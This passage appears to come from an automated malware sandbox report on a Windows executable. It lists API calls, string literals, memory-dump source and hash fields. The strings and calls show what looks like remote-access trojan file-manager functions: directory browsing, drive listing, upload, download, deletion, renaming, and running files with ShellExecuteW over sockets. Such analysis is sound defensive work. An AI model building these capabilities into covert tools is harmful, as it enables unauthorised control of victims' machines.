                                          • Part of subcall function 00402440: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040248D
                                          • Part of subcall function 00402440: ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60(?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402498
                                          • Part of subcall function 00402440: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024A7
                                          • Part of subcall function 00402440: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024B1
                                          • Part of subcall function 00402440: send.WS2_32(?,00000000), ref: 004024BB
                                          • Part of subcall function 00402440: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402512
                                          • Part of subcall function 00402440: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040251B
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Failed to download file: ,00000000,?,00000000,?,00000000,00000000), ref: 00404300
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([ERROR],?,?,?,Failed to download file: ,00000000,?,00000000,?,00000000,00000000), ref: 00404311
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 00404325
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 00404331
                                        • closesocket.WS2_32(?), ref: 0040433A
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,?,00000000,?,00000000,00000001,00000000,00000000), ref: 004043F7
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,00000001,00000000,00000000), ref: 00404401
                                        • CreateDirectoryW.KERNEL32(00000000,?,?,00000001,00000000,00000000), ref: 00404408
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,00000001,00000000,00000000), ref: 00404414
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,00000001,00000000,00000000), ref: 00404420
                                        • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@G@Z.MSVCP60(0000002A,?,?,00000001,00000000,00000000), ref: 0040442B
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,00000000), ref: 0040443A
                                        • ?rfind@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIGI@Z.MSVCP60(0000005C,69D65DF8,00000001,00000000), ref: 00404489
                                        • ?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000001), ref: 00404499
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,?,?), ref: 004044AE
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 004044B8
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 004044C2
                                        • _wrename.MSVCRT ref: 004044C9
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004044E0
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?), ref: 00404587
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 00404591
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040459D
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 004045A6
                                        • GetFileAttributesW.KERNEL32(00000000), ref: 004045AD
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 004045BA
                                          • Part of subcall function 00412BEE: wcscpy.MSVCRT ref: 00412C0A
                                          • Part of subcall function 00412BEE: wcscat.MSVCRT ref: 00412C1E
                                          • Part of subcall function 00412BEE: wcscpy.MSVCRT ref: 00412C2A
                                          • Part of subcall function 00412BEE: wcscat.MSVCRT ref: 00412C38
                                          • Part of subcall function 00412BEE: FindFirstFileW.KERNEL32(?,?), ref: 00412C4B
                                          • Part of subcall function 00412BEE: wcscpy.MSVCRT ref: 00412C6B
                                          • Part of subcall function 00412BEE: FindNextFileW.KERNEL32(004085F5,?), ref: 00412C83
                                          • Part of subcall function 00412BEE: wcscat.MSVCRT ref: 00412CB4
                                          • Part of subcall function 00412BEE: RemoveDirectoryW.KERNEL32(?), ref: 00412CD9
                                          • Part of subcall function 00412BEE: wcscpy.MSVCRT ref: 00412CE9
                                          • Part of subcall function 00412BEE: FindClose.KERNEL32(004085F5), ref: 00412D39
                                          • Part of subcall function 00412BEE: RemoveDirectoryW.KERNEL32(004085F5), ref: 00412D42
                                          • Part of subcall function 00412855: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412860
                                          • Part of subcall function 00412855: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 0041286C
                                          • Part of subcall function 00412855: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412876
                                          • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                          • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 004045C9
                                        • DeleteFileW.KERNEL32(00000000), ref: 004045D0
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Deleted file: ,00000000,?,?,?,?), ref: 004045FA
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,Deleted file: ,00000000,?,?,?,?), ref: 0040460B
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Unable to delete: ,00000000,?,?,?,?,00000055), ref: 00404659
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([ERROR],?,?,?,Unable to delete: ,00000000,?,?,?,?,00000055), ref: 0040466A
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000055), ref: 0040467E
                                        • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,00000001,00415908,?,?,?,?,?,?,?,00000055), ref: 00404694
                                        • ?rfind@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIGI@Z.MSVCP60(0000005C,69D65DF8,?,?,?,?,?,00000055), ref: 004046AC
                                        • ?resize@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEXI@Z.MSVCP60(00000001,?,?,?,?,?,00000055), ref: 004046B7
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z.MSVCP60(?,?,0000002A,?,?,?,?,?,00000055), ref: 004046CA
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,00000055), ref: 004046D6
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00000055), ref: 004046E2
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000055), ref: 004046F4
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000055), ref: 004046FD
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,?,0041594C), ref: 004044FA
                                          • Part of subcall function 00403325: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,00000000), ref: 0040333B
                                          • Part of subcall function 00403325: FindFirstFileW.KERNEL32(00000000,?,?,00000000), ref: 00403342
                                          • Part of subcall function 00403325: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(00000054), ref: 00403468
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Unable to rename file!,0041B310,00415948), ref: 00404523
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,00415948), ref: 0040452D
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000059,?,?,?,?,?,00415948), ref: 00404547
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00415948), ref: 00404550
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00415948), ref: 00404559
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,Uploaded file: ,00000000,?,00000000,?,00000000,00000000), ref: 00403DC2
                                          • Part of subcall function 0041203B: GetLocalTime.KERNEL32(?), ref: 00412052
                                          • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00416BFC,?,00415770,?,?,Q@,?), ref: 00412087
                                          • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,Q@,?), ref: 00412094
                                          • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,Q@,?), ref: 004120A1
                                          • Part of subcall function 0041203B: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,Q@,?), ref: 004120AE
                                          • Part of subcall function 0041203B: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,Q@,?), ref: 004120B8
                                          • Part of subcall function 0041203B: printf.MSVCRT ref: 004120BF
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120CB
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120D4
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120DD
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120E6
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120EF
                                          • Part of subcall function 0041203B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,Q@), ref: 004120F8
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Failed to upload file: ,00000000,?,00000000,?,00000000,00000000), ref: 00403E09
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([ERROR],?,?,?,Failed to upload file: ,00000000,?,00000000,?,00000000,00000000), ref: 00403E1A
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 00403E2E
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 00403E37
                                          • Part of subcall function 004127F5: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,0040464E,?,?,00000055), ref: 00412804
                                          • Part of subcall function 004127F5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000000,?,0040464E,?,?,00000055), ref: 0041280E
                                          • Part of subcall function 004127F5: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(?,0040464E,?,?,00000055), ref: 00412817
                                          • Part of subcall function 004127F5: ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,0040464E,?,?,00000055), ref: 00412821
                                          • Part of subcall function 004127F5: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,0040464E,?,?,00000055), ref: 0041282B
                                          • Part of subcall function 004127F5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,00000055), ref: 00412841
                                          • Part of subcall function 004127F5: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000055), ref: 0041284A
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 00403D3D
                                          • Part of subcall function 00412881: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,0041BCB0,00000000,0040903C,004140D8,00000000,0000000B), ref: 0041288D
                                          • Part of subcall function 00412881: ??2@YAPAXI@Z.MSVCRT ref: 0041289B
                                          • Part of subcall function 00412881: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128BD
                                          • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004128DF
                                          • Part of subcall function 00412881: ??3@YAXPAX@Z.MSVCRT ref: 004128E6
                                          • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128F3
                                          • Part of subcall function 00412881: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128FC
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000,00000001,00000000), ref: 00403E6B
                                        • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 00403E78
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Executing file: ,00000000,?,?,?,?), ref: 00403E99
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,Executing file: ,00000000,?,?,?,?), ref: 00403EAA
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403EBE
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,00000000,00000000), ref: 00403EE9
                                        • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,00000000), ref: 00403EFA
                                        • ?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,-00000002,?,?,?,00000000), ref: 00403F0E
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Browsing directory: ,00000000,?,?,?,00000000,?,?,?,00000000), ref: 00403F2C
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,Browsing directory: ,00000000,?,?,?,00000000,?,?,?,00000000), ref: 00403F3D
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00403F51
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00403F5D
                                        • GetLogicalDriveStringsA.KERNEL32 ref: 00403F74
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000064,?), ref: 00403F8A
                                        • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z.MSVCP60(004159C4,00000000,00000002), ref: 00403F9C
                                        • ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z.MSVCP60(00000001), ref: 00403FA7
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00403FB6
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,0041B310,00000000), ref: 00403FD8
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,00000000), ref: 00403FE2
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000051,?,?,?,?,?,00000000), ref: 00403FFC
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 00404008
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000001,0041B310,00000000,00000002,0041B310,00000000), ref: 00404083
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000002,0041B310,00000000), ref: 00404093
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,0041B310,00000000), ref: 004040A3
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,0041B310,00000000), ref: 004040AD
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004040C8
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004040D4
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004040E0
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Expected file size: ,00000000), ref: 004040FC
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([DEBUG],?,?,?,Expected file size: ,00000000), ref: 0040410E
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Downloading file: ,00000000,?,00000000,?,00000000,00000000), ref: 00404148
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,Downloading file: ,00000000,?,00000000,?,00000000,00000000), ref: 0040415A
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 0040416E
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 0040417A
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,00000000), ref: 00404187
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00000000), ref: 00404342
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00404378
                                        • StrToIntA.SHLWAPI(00000000), ref: 0040437F
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000001), ref: 004043A2
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000055), ref: 0040470E
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000055), ref: 0040471F
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000055), ref: 00404728
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$G@std@@$??1?$basic_string@$G@2@@std@@$??0?$basic_string@$V?$basic_string@$Hstd@@$D@2@@0@$D@1@@$?c_str@?$basic_string@$V01@@$V10@@$?length@?$basic_string@$V10@0@$File$V01@V12@$V10@$?substr@?$basic_string@FindG@2@@0@wcscpy$??4?$basic_string@?size@?$basic_string@CreateDirectoryG@1@@Y?$basic_string@wcscat$?begin@?$basic_string@?empty@?$basic_string@?find@?$basic_string@?resize@?$basic_string@?rfind@?$basic_string@A?$basic_string@FirstRemove$??2@??3@??8std@@??9std@@?append@?$basic_string@?data@?$basic_string@?end@?$basic_string@AttributesCloseDeleteDriveEventExecuteLocalLogicalNextShellStringsTime_itoa_wrenameatoiclosesocketprintfrecvsend
                                        • String ID: Browsing directory: $Deleted file: $Downloaded file size: $Downloaded file: $Downloading file: $Executing file: $Expected file size: $Failed to download file: $Failed to upload file: $Unable to delete: $Unable to rename file!$Uploaded file: $[DEBUG]$[ERROR]$[INFO]$open
                                        • API String ID: 1698304352-2559757301
                                        • Opcode ID: d1b39ca36b1fd84df46e3bbf6e0ac8e81529882f0b644365a7a0582e2d7ac8c2
                                        • Instruction ID: cb52a323490428edf8fa9013e568b6c0705a1129d991cf782fce7d07dea18215
                                        • Opcode Fuzzy Hash: d1b39ca36b1fd84df46e3bbf6e0ac8e81529882f0b644365a7a0582e2d7ac8c2
                                        • Instruction Fuzzy Hash: 4D528DB2910508EBCB05FBA1DC8ADEE773CFB54345F00456AF516A30A1EF785A84CB69
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040D2A6, Relevance: 210.9, APIs: 117, Strings: 3, Instructions: 868sleepfilenetworkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040D2BC
                                        • SetEvent.KERNEL32(?), ref: 0040D2C5
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040D2CE
                                        • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,69D65DF0), ref: 0040D2E8
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 0040D2F9
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040D308
                                          • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                          • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                          • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                          • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
